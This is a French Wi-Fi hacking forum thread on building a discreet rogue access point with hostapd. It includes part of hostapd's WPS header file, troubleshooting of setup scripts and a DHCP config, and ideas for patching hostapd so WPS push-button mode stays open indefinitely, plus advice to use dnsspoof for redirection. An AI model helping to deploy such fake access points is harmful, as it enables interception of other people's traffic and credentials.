	ATTR_802_1X_ENABLED = 0x1062,
	ATTR_APPSESSIONKEY = 0x1063,
	ATTR_WEPTRANSMITKEY = 0x1064,
	ATTR_REQUESTED_DEV_TYPE = 0x106a,
	ATTR_EXTENSIBILITY_TEST = 0x10fa /* _NOT_ defined in the spec */
};

#define WPS_VENDOR_ID_WFA 14122

/* WFA Vendor Extension subelements */
enum {
	WFA_ELEM_VERSION2 = 0x00,
	WFA_ELEM_AUTHORIZEDMACS = 0x01,
	WFA_ELEM_NETWORK_KEY_SHAREABLE = 0x02,
	WFA_ELEM_REQUEST_TO_ENROLL = 0x03,
	WFA_ELEM_SETTINGS_DELAY_TIME = 0x04
};

/* Device Password ID */
enum wps_dev_password_id {
	DEV_PW_DEFAULT = 0x0000,
	DEV_PW_USER_SPECIFIED = 0x0001,
	DEV_PW_MACHINE_SPECIFIED = 0x0002,
	DEV_PW_REKEY = 0x0003,
	DEV_PW_PUSHBUTTON = 0x0004,
	DEV_PW_REGISTRAR_SPECIFIED = 0x0005
};

/* Message Type */
enum wps_msg_type {
	WPS_Beacon = 0x01,
	WPS_ProbeRequest = 0x02,
	WPS_ProbeResponse = 0x03,
	WPS_M1 = 0x04,
	WPS_M2 = 0x05,
	WPS_M2D = 0x06,
	WPS_M3 = 0x07,
	WPS_M4 = 0x08,
	WPS_M5 = 0x09,
	WPS_M6 = 0x0a,
	WPS_M7 = 0x0b,
	WPS_M8 = 0x0c,
	WPS_WSC_ACK = 0x0d,
	WPS_WSC_NACK = 0x0e,
	WPS_WSC_DONE = 0x0f
};

/* Authentication Type Flags */
#define WPS_AUTH_OPEN 0x0001
#define WPS_AUTH_WPAPSK 0x0002
#define WPS_AUTH_SHARED 0x0004
#define WPS_AUTH_WPA 0x0008
#define WPS_AUTH_WPA2 0x0010
#define WPS_AUTH_WPA2PSK 0x0020
#define WPS_AUTH_TYPES (WPS_AUTH_OPEN | WPS_AUTH_WPAPSK | WPS_AUTH_SHARED | \
			WPS_AUTH_WPA | WPS_AUTH_WPA2 | WPS_AUTH_WPA2PSK)

/* Encryption Type Flags */
#define WPS_ENCR_NONE 0x0001
#define WPS_ENCR_WEP 0x0002
#define WPS_ENCR_TKIP 0x0004
#define WPS_ENCR_AES 0x0008
#define WPS_ENCR_TYPES (WPS_ENCR_NONE | WPS_ENCR_WEP | WPS_ENCR_TKIP | \
			WPS_ENCR_AES)

/* Configuration Error */
enum wps_config_error {
	WPS_CFG_NO_ERROR = 0,
	WPS_CFG_OOB_IFACE_READ_ERROR = 1,
	WPS_CFG_DECRYPTION_CRC_FAILURE = 2,
	WPS_CFG_24_CHAN_NOT_SUPPORTED = 3,
	WPS_CFG_50_CHAN_NOT_SUPPORTED = 4,
	WPS_CFG_SIGNAL_TOO_WEAK = 5,
	WPS_CFG_NETWORK_AUTH_FAILURE = 6,
	WPS_CFG_NETWORK_ASSOC_FAILURE = 7,
	WPS_CFG_NO_DHCP_RESPONSE = 8,
	WPS_CFG_FAILED_DHCP_CONFIG = 9,
	WPS_CFG_IP_ADDR_CONFLICT = 10,
	WPS_CFG_NO_CONN_TO_REGISTRAR = 11,
	WPS_CFG_MULTIPLE_PBC_DETECTED = 12,
	WPS_CFG_ROGUE_SUSPECTED = 13,
	WPS_CFG_DEVICE_BUSY = 14,
	WPS_CFG_SETUP_LOCKED = 15,
	WPS_CFG_MSG_TIMEOUT = 16,
	WPS_CFG_REG_SESS_TIMEOUT = 17,
	WPS_CFG_DEV_PASSWORD_AUTH_FAILURE = 18
};

/* Vendor specific Error Indication for WPS event messages */
enum wps_error_indication {
	WPS_EI_NO_ERROR,
	WPS_EI_SECURITY_TKIP_ONLY_PROHIBITED,
	WPS_EI_SECURITY_WEP_PROHIBITED,
	NUM_WPS_EI_VALUES
};

/* RF Bands */
#define WPS_RF_24GHZ 0x01
#define WPS_RF_50GHZ 0x02

/* Config Methods */
#define WPS_CONFIG_USBA 0x0001
#define WPS_CONFIG_ETHERNET 0x0002
#define WPS_CONFIG_LABEL 0x0004
#define WPS_CONFIG_DISPLAY 0x0008
#define WPS_CONFIG_EXT_NFC_TOKEN 0x0010
#define WPS_CONFIG_INT_NFC_TOKEN 0x0020
#define WPS_CONFIG_NFC_INTERFACE 0x0040
#define WPS_CONFIG_PUSHBUTTON 0x0080
#define WPS_CONFIG_KEYPAD 0x0100
#ifdef CONFIG_WPS2
#define WPS_CONFIG_VIRT_PUSHBUTTON 0x0280
#define WPS_CONFIG_PHY_PUSHBUTTON 0x0480
#define WPS_CONFIG_VIRT_DISPLAY 0x2008
#define WPS_CONFIG_PHY_DISPLAY 0x4008
#endif /* CONFIG_WPS2 */

/* Connection Type Flags */
#define WPS_CONN_ESS 0x01
#define WPS_CONN_IBSS 0x02

/* Wi-Fi Protected Setup State */
enum wps_state {
	WPS_STATE_NOT_CONFIGURED = 1,
	WPS_STATE_CONFIGURED = 2
};

/* Association State */
enum wps_assoc_state {
	WPS_ASSOC_NOT_ASSOC = 0,
	WPS_ASSOC_CONN_SUCCESS = 1,
	WPS_ASSOC_CFG_FAILURE = 2,
	WPS_ASSOC_FAILURE = 3,
	WPS_ASSOC_IP_FAILURE = 4
};


#define WPS_DEV_OUI_WFA 0x0050f204

enum wps_dev_categ {
	WPS_DEV_COMPUTER = 1,
	WPS_DEV_INPUT = 2,
	WPS_DEV_PRINTER = 3,
	WPS_DEV_CAMERA = 4,
	WPS_DEV_STORAGE = 5,
	WPS_DEV_NETWORK_INFRA = 6,
	WPS_DEV_DISPLAY = 7,
	WPS_DEV_MULTIMEDIA = 8,
	WPS_DEV_GAMING = 9,
	WPS_DEV_PHONE = 10
};

enum wps_dev_subcateg {
	WPS_DEV_COMPUTER_PC = 1,
	WPS_DEV_COMPUTER_SERVER = 2,
	WPS_DEV_COMPUTER_MEDIA_CENTER = 3,
	WPS_DEV_PRINTER_PRINTER = 1,
	WPS_DEV_PRINTER_SCANNER = 2,
	WPS_DEV_CAMERA_DIGITAL_STILL_CAMERA = 1,
	WPS_DEV_STORAGE_NAS = 1,
	WPS_DEV_NETWORK_INFRA_AP = 1,
	WPS_DEV_NETWORK_INFRA_ROUTER = 2,
	WPS_DEV_NETWORK_INFRA_SWITCH = 3,
	WPS_DEV_DISPLAY_TV = 1,
	WPS_DEV_DISPLAY_PICTURE_FRAME = 2,
	WPS_DEV_DISPLAY_PROJECTOR = 3,
	WPS_DEV_MULTIMEDIA_DAR = 1,
	WPS_DEV_MULTIMEDIA_PVR = 2,
	WPS_DEV_MULTIMEDIA_MCX = 3,
	WPS_DEV_GAMING_XBOX = 1,
	WPS_DEV_GAMING_XBOX360 = 2,
	WPS_DEV_GAMING_PLAYSTATION = 3,
	WPS_DEV_PHONE_WINDOWS_MOBILE = 1
};


/* Request Type */
enum wps_request_type {
	WPS_REQ_ENROLLEE_INFO = 0,
	WPS_REQ_ENROLLEE = 1,
	WPS_REQ_REGISTRAR = 2,
	WPS_REQ_WLAN_MANAGER_REGISTRAR = 3
};

/* Response Type */
enum wps_response_type {
	WPS_RESP_ENROLLEE_INFO = 0,
	WPS_RESP_ENROLLEE = 1,
	WPS_RESP_REGISTRAR = 2,
	WPS_RESP_AP = 3
};

/* Walk Time for push button configuration (in seconds) */
#define WPS_PBC_WALK_TIME 120

#define WPS_MAX_AUTHORIZED_MACS 5

#endif /* WPS_DEFS_H */

IL faudra que je regarde ça de plus près.

Hors Ligne

#13 21-04-2014 14:52:42

Fab955
Membre Irremplaçable
Inscription : 14-11-2013
Messages : 706

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

Salut, beau tutos en effet. Je m'y tente.
J'ai suivi le tutos et ai recopier le script hostapd.sh que tu nous a donné koala. Le script s'execute  sauf que j'ai une erreur

hostapd.sh: ligne14: oute : commande introuvable

Et ensuite

au lancement du dhcp : check syslog for diagnostics. ... failed! failed!

Le reste se déroule normalement.

Je vais revérifier si je n'ai pas fait d'erreur en attendant.

Merci.

Hors Ligne

#14 21-04-2014 15:20:02

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

hostapd.sh: ligne14: oute : commande introuvable
Et ensuite
au lancement du dhcp : check syslog for diagnostics. ... failed! failed!

J'ai oublier le "r" a route c'est pour ça tongue pour ta seconde question je pense que tu devrais vérifier que ton serveur dhcp est correctement installé (isc-dhcp) est surtout que ton dhcp n'est pas foireux, ce qui peut arriver aussi wink

Hors Ligne

#15 21-04-2014 16:10:16

Fab955
Membre Irremplaçable
Inscription : 14-11-2013
Messages : 706

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

J'ai été voir le fichier dhcpd.conf et justement il n'était pas configurer. Donc j'ai repris la config de dhcp que tu indiquais pour le tuto su script securethis et la encore en relançant le script hosapd.sh j'ai une erreur de fin de ligne de commande manquante ou quelque chose de similaire.
Je vais poursuivre mes recherches. Si tu pouvais me guider en même temps.
Je suis un tit peu chiantesiste sur les bords hein!! mais bon en même temps j'apprend et je débute c'est encore un peu fouilli pour moi tout ça pour le moment.

Merci d'avance.

Hors Ligne

#16 21-04-2014 16:50:34

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

@Fab955

Si tu a rajouter le "r" a la ligne 14 normalement tu devrais pas avoir d'erreur.

Sinon j'ai trouvé le fichier et les lignes de code qu'il faudrait modifié pour rendre le wps_pbc actif pour plus de 2 minutes, c'est dans /src/wps_er.c:

if (attr->dev_name) {
		os_free(sta->dev_name);
		sta->dev_name = os_malloc(attr->dev_name_len + 1);
		if (sta->dev_name) {
			os_memcpy(sta->dev_name, attr->dev_name,
				  attr->dev_name_len);
			sta->dev_name[attr->dev_name_len] = '\0';
		}
	}

	eloop_cancel_timeout(wps_er_sta_timeout, sta, NULL);
	eloop_register_timeout(300, 0, wps_er_sta_timeout, sta, NULL);

	if (m1 || new_sta)
		wps_er_sta_event(ap->er->wps, sta, WPS_EV_ER_ENROLLEE_ADD);

	return sta;

Pour l'info cette ligne "eloop_register_timeout(300, 0, wps_er_sta_timeout, sta, NULL);" correspond a la gestion du délai du PIN configuré pour l'AP, le readmewps indique:

To reduce likelihood of PIN being used with other devices or of
forgetting an active PIN available for potential attackers, expiration
time in seconds can be set for the new PIN (value 0 indicates no
expiration):

hostapd_cli wps_pin any 12345670 300

On peut apparemment pas gérer le temps avec le PBC, j'ai quand meme essayer un: (sait-on jamais)

wps_pbc any NONE 0

ça ne marchait pas donc je suis aller fouiné dans les sources et j'ai donc trouvé cette ligne "if (m1 || new_sta)wps_er_sta_event(ap->er->wps, sta, WPS_EV_ER_ENROLLEE_ADD);"

Le code en lui meme est bon mais aucune notion de temps et donner a part celui par défaut pour le PBC hmm

Il faudrait modifier cette partie en mettant une valeur temps configurable avant la ligne qui détecte le M1 et ajoute la station comme ça on garderait le wps_pbc activé pour un délai que l'on souhaite smile

eloop_pbc_register_timeout(300, 0, wps_er_sta_pbc_timeout, sta, NULL);

Mais bon je suis une quiche en C cool

Dernière modification par koala (21-04-2014 16:57:35)

Hors Ligne

#17 21-04-2014 16:59:22

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

Moi aussi je suis une quiche en C. Une quiche sans fromage, sans lardons, sans crême fraîche...
IL faudrait modifier le fichier  avant de le compiler ... right?
Peut être qu'au lieu de 0 mettre 9999 ou quelquechose dans le genre... hmm

Hors Ligne

#18 21-04-2014 17:05:28

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

kcdtv a écrit :

Moi aussi je suis une quiche en C. Une quiche sans fromage, sans lardons, sans crême fraîche...

ça me rassure je suis pas le seul big_smile

IL faudrait modifier le fichier  avant de le compiler ... right?

C'est sa cool

kcdtv a écrit :

Peut être qu'au lieu de 0 mettre 9999 ou quelquechose dans le genre...


En faite j'ai tester la commande en mettant 0 car c'est la valeur de non expiration indiqué pour un PIN, donc je me suis dis la meme pour le PBC.Si 0 est considérer comme infini d'après le readme concernant le PIN autant faire pareil pour le PBC car moins de codage a faire je pense smile

Dernière modification par koala (21-04-2014 17:06:20)

Hors Ligne

#19 21-04-2014 17:14:50

Fab955
Membre Irremplaçable
Inscription : 14-11-2013
Messages : 706

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

Si vous êtes des quiches, alors qu suis-je?? mad:mad::mad:

Voila l'erreur que ça me retourne koala pourtant j'ai bien rajouter le r de route:

/etc/dhcp/dhcpd.conf line 6: unexpected end of file
allow unknown-clients;

j'ai revérifier tout le script tout est bon pourtant maintenant.

Dans le fichier dhcpd.conf dans etc/dhcp j'ai mis ça

subnet 10.0.0.0 netmask 255.255.255.0 {
interface wlan0;
range 10.0.0.2 10.0.0.10;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
allow unknown-clients;
}

c'est grave docteur?

bon j'ai résolu le pb il manquait juste la dernière accolade pour femer les lignes dans le dhcpd.conf

Dernière modification par Fab955 (21-04-2014 18:22:14)

Hors Ligne

#20 21-04-2014 18:54:44

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

salut koala,
j'ai télécharger  hostapd-2.0 avec la commande
wget http://hostap.epitest.fi/releases/hostapd-2.0.tar.gz

mais quand j'ai executé ça
tar -zxvf hostapd-2.0.tar.gz

j'ai ce probéme

http://www.crack-wifi.com/forum/img/mem … 193826.png

dans le root j'ai 2 fichiers

hostapd-2.0.tar.gz  -------- 1.1ko
hostapd-2.0.tar.gz.1 ---------- 1.4Mo

Hors Ligne

#21 21-04-2014 19:04:43

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

ça c'est encore moi qui me suis gouurer dans la commande en faisant le tuto:

tar -xvzf  hostapd-2.0.tar.gz

Ps: modifié dans le tuto

Dernière modification par koala (21-04-2014 19:09:17)

Hors Ligne

#22 21-04-2014 19:11:13

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

ça marche !!! cette nuit sera les essaie WPA WPS

Hors Ligne

#23 21-04-2014 19:12:52

Fab955
Membre Irremplaçable
Inscription : 14-11-2013
Messages : 706

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

Opération success pour moi.

Mes pages n'étais pas rediriger mais je me suis connecter sur mon fake AP tout de même.

Ca avance doucement mais surement...

Hors Ligne

#24 21-04-2014 19:18:52

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

y'a pas un moyen d'automatiser   la fonction  WPS_PBC, c'est à dire un script qui controle toute connexion entrante il execute automatiquement wps_pbc au lieu de laisser les yeux sur le PC

Hors Ligne

#25 21-04-2014 19:23:15

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

@Fab955

Bien joué ! utilise dnsspoof en supplément pour le redirection wink

@FFOO31

J'y travaille mais je cherche plus a modifier le code source d'hostapd pour qu'on est pas besoin d'automatiser tout ça que le wps_pbc reste actif par défaut dès qu'on le rentre.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.057 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]